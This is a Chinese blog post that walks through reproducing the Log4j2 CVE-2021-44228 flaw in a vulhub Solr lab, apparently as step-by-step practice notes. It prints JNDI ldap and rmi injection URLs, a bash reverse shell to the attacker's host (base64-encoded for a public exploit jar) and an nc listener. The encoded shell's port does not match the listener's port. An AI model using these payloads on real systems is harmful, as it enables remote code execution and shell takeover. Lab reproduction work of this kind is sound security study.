前言：
Apache Log4j 2 是對(duì) Log4j 的升級(jí)，它比其前身 Log4j 1.x 提供了顯著改進(jìn)，并提供了 Logback 中可用的許多改進(jìn)，同時(shí)修復(fù)了 Logback 架構(gòu)中的一些固有問(wèn)題。
2021 年 12 月，在 Apache Log4j2 中發(fā)現(xiàn)了一個(gè) 0-day 漏洞。Log4j 的 JNDI 支持并沒(méi)有限制可以解析的名稱(chēng)。一些協(xié)議像rmi:和ldap:是不安全的或者可以允許遠(yuǎn)程代碼執(zhí)行。

受影響版本：
Apache Log4j 2.x <= 2.14.1

正文：
環(huán)境搭建：
依托vulhub靶場(chǎng)搭建環(huán)境，漏洞啟動(dòng)目錄：

/vulhub-master/log4j/CVE-2021-44228

啟動(dòng)命令：

docker-compose up -d

啟動(dòng)成功后訪問(wèn)地址：http://192.168.0.110:8983/solr/#/
IP換成你自己的靶機(jī)IP即可
搭建效果：
漏洞復(fù)現(xiàn)：
首先我們需要準(zhǔn)備一臺(tái)kali
工具用到的是大佬開(kāi)發(fā)的exp

https://github.com/bkfish/Apache-Log4j-Learning/

這里我們直接下載到kali中也可以，工具具體目錄在文件中的tools目錄下
我們直接開(kāi)始演示
先利用dnslog生成一個(gè)用于接收回參的網(wǎng)址
然后我們對(duì)目標(biāo)網(wǎng)站進(jìn)行測(cè)試，訪問(wèn)網(wǎng)址：

http://192.168.0.110:8983/solr/admin/cores?action=${jndi:ldap://4wuy7v.dnslog.cn}

同樣是換成你自己的IP和生成的dnslog值即可
我們等十秒點(diǎn)擊第一個(gè)箭頭處的刷新就可以看到回顯，ok這里可以利用
我們繼續(xù)下一步，進(jìn)行nc的反彈shell
首先到kali中打開(kāi)我們事先準(zhǔn)備好的exp
解壓后到tools目錄下
構(gòu)造payload：

bash -i >& /dev/tcp/192.168.0.106/6969 0>&1

這里IP是kali的IP，端口是你等會(huì)nc監(jiān)聽(tīng)的端口
然后我們將這個(gè)加密為base64
直接使用工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA2LzEyMzUgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.0.106

這里echo后面就是你加密之后的值，最后面的IP還是kali的IP，回車(chē)啟動(dòng)
這里會(huì)生成兩個(gè)協(xié)議各一個(gè)執(zhí)行命令，這兩個(gè)協(xié)議在log4j2中都有執(zhí)行權(quán)限
我們使用第一個(gè)，再次構(gòu)造一個(gè)payload

${jndi:rmi://192.168.0.106:1099/sm0syp}

到kali中開(kāi)啟nc

nc -lvvp 6969

然后我們將這個(gè)payload插入到action的后面

http://192.168.0.110:8983/solr/admin/cores?action=${jndi:rmi://192.168.0.106:1099/sm0syp}

回車(chē)直接訪問(wèn)
再次回到kali中我們可以看到nc成功反彈shell

裙：70844080
vx gzh：白安全組
作者：【白】

參考文章：文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-524281.html

https://blog.csdn.net/m0_56773673/article/details/122300927?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165236333216781483782069%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=165236333216781483782069&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-5-122300927-null-null.142^v9^control,157^v4^control&utm_term=vukhub%E9%9D%B6%E5%9C%BAlog4j2%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0&spm=1018.2226.3001.4187

https://blog.csdn.net/weixin_43795682/article/details/123557217?ops_request_misc=&request_id=&biz_id=102&utm_term=vukhub%E9%9D%B6%E5%9C%BAlog4j2%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-3-123557217.142^v9^control,157^v4^control&spm=1018.2226.3001.4187

到了這里，關(guān)于log4j2漏洞CVE-2021-44228復(fù)現(xiàn)筆記(純步驟過(guò)程，沒(méi)有復(fù)雜的知識(shí)點(diǎn))的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！